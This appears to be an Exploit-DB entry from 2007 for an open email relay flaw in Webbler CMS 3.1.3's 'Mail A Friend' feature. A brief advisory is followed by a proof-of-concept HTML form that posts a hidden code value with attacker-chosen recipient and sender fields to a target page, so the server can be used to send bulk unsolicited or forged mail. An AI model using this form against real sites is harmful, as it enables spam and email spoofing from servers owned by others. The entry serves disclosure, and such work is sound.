Webbler CMS 3.1.3 - Mail A Friend Open Email Relay

EDB-ID:

30379

CVE:

N/A




Platform:

PHP

Date:

2007-07-24


source: https://www.securityfocus.com/bid/25045/info

The 'webbler' is prone to an open-email-relay vulnerability.

An attacker may leverage the issue to use webservers that are hosting the vulnerable software to send arbitrary unsolicited bulk email. Attackers may also forge email messages that originate from trusted mail servers.

This issue affects webbler 3.1.3; prior versions may also be affected. 

 <form method="post" action="http://www.target-domain.com/?lid=12506">
        <input type="hidden" name="code" value="4672577a2d323">
        <input type="hidden" name="referral_uri" value="">
        <input type="hidden" name="document_title" value="">
        <input type="text" name="recipient" value="">
        <input type="text" name="username" value="">
        <input type="text" name="useremail" value="">
        <INPUT class="sendbutton" type=submit name=sa VALUE="send page">
        </form>